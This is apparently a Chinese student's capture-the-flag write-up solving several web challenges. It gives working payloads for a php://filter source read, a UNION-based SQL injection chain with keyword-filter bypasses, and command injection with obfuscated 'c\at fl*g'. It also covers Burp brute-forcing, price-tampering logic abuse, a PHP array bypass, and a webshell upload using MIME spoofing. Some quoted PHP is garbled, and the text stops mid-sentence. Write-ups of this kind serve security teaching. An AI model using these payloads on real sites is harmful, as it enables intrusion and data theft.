一个朴实的页面
打开题目后发现无论在输入框怎么输入都无法输入成功,鼠标和键盘输入也都没有作用,也无法通过快捷键和鼠标查看源代码,最后通过网页的菜单栏成功查看了网页源代码。
我们在源代码中发现了本题禁止了所有查看源代码的方法。
通过网页的提示“web拿到一个网站第一步应该怎么做”,我们想到拿御剑扫描一下这个网站,得到了含有robots协议的两个网址。
点击第一个网址后得到了一个php文件。
我们将文件输入到地址栏中,得到了网页源代码。通过源代码我们可以知道本题屏蔽了base,我们可以将小写的base替换为大写的Base。
输入构建以下语句将flag转换为base64编码进行查看。将得到的编码进行解码得到flag。
?G7=php://filter/convert.Base64-encode/resource=flag.php
斗宗强者恐怖如斯
点开题目后是一个登录页面,通过题目的提示得到用户名是admin,我们接着用弱口令进行尝试得到密码是admin123.成功登录后的界面是两个问号
我们尝试进行注入 ,输入id=1’,报错,说明存在注入点。
接着判断字段个数,输入,有回显,证明表中只存在3列。
?id=-1') union select 1,2,3--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆出数据库名。接着爆出表名,但是报错了,通过报错信息可知information少了or
?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’xitif_sql’ --+
我们进行修改,修改后,爆出表名,发现flag文件
?id=-1’) union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=’xitif_sql’ --+
接着进行爆表中的字段,得到flAg文件。?id=-1') union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag' --+
最后利用?id=-1') union select 1,2,group_concat(flAg) from xitif_sql.flag --+打开文件,得到flag。
Rceeee
打开后是源代码,通过观察可知本题屏蔽了大量字符
通过构建?cmd=ls/|tee a.txt打开文件目录
因为本题屏蔽了cat flag 等字符所以我们用c\at fl*g代替,构建?cmd=c\at/fl*g|tee a.txt 来打开flag文件。
师姐的生日
由题目可知师姐的生日是四位数,首先利用bp进行抓包,导入字典进行爆破,师姐的生日为四位数,所以最大值和最小值都设置为4,从0000到9999进行爆破。
爆破后得到师姐的生日为0326,将生日输入后得到本题的flag 。
云曦超市大甩卖
打开题目后发现一共有几个商品,其中有flag,需要999999,但是自己只有1000,没有足够的钱去购买flag,我们先打开bp进行抓包,发现其中代码中有价格,我们可以将题目中的商品价格进行修改,使得我们能够买得起flag。将商品价格改为-9999,利用了逻辑漏洞,使我们越买东西钱越多,那样我们就可以买得起flag了。修改完代码后,我们再次购买几个物品,我们的钱就可以买flag了,购买flag后就得到了本题的flag。
Gentle_sister
打开题目后是一张图片,上面有一个点我看看,点击之后发现没有任何显示,查看网页源代码也是什么都没有,于是我们返回图片,查看图片的源代码,发现其中有一串代码
if(isset ($_GET['my_parameter'])) (
$param_name = $_GETl'my_parameter'];
if (preg_match("/[o-9]/", $my_parameter)){
die ("error!");
}
if(intval ($my_parameter)){
echo $flag;
}
输入paramenter[]1,即可得到本题的flag。
这都不做
由题目可知是一道文件上传类型的题,我们首先上传了一个包含一句话木马的php文件,结果显示application/octet-streaminvalid file type!jpg only!!通过搜索发现该文件时MIME型文件。
我们通过bp进行抓包,将文件类型改为image/jpeg.
改完后继续上传文件,结果还是上传不了,通过搜索发现是服务器被设置为不允许通过文件URL访问PHP解析器
我们继续修改,将PHP删除改为-,再次上传文件
显示上传成功,问我们上传路径是什么
我们在地址栏输入172.16.17.201:50142/upload/1.php,结果显示无法显示,得知上传路径错误,通过尝试发现文件上传中包含双写绕过